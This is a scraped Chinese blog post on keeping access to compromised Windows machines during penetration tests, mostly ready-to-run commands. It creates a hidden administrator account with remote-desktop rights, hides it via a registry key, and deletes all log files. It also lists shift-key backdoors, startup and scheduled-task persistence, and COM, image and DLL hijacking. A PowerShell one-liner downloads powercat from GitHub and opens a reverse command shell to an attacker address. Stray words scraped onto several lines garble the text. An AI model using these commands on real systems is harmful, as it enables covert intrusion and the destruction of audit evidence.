滲透測試之權限維持的方法

時間  2019-11-11
標籤 滲透 測試 權限 維持 方法 简体版
原文   原文鏈接

權限維持的方法html

基本上如今常見的方法有如下幾種:git

一、隱藏、克隆帳戶github

windows 隱藏帳戶shell

net localgroup 「Domain Admin」 test$ /addwindows

net user test$ test /add
net localgroup Administrators test$ /add
net localgroup "Remote Desktop Users" test$ /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v test$ /T REG_DWORD /D 0
net user test$ /del
del %WINDIR%\*.log /a/s/q/f 刪除全部日誌文件
二、shift後門
三、啓動項、計劃任務
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\startupspa

四、劫持技術
com劫持
映像劫持 : 改註冊表,debugger
dll劫持,clr
五、Powershell後門
powershell IEX (New-Object debug

System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip地址 -p 端口 -e cmd日誌

 

詳細步驟連接:https://www.cnblogs.com/xiaozi/p/7613288.htmlhtm

相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程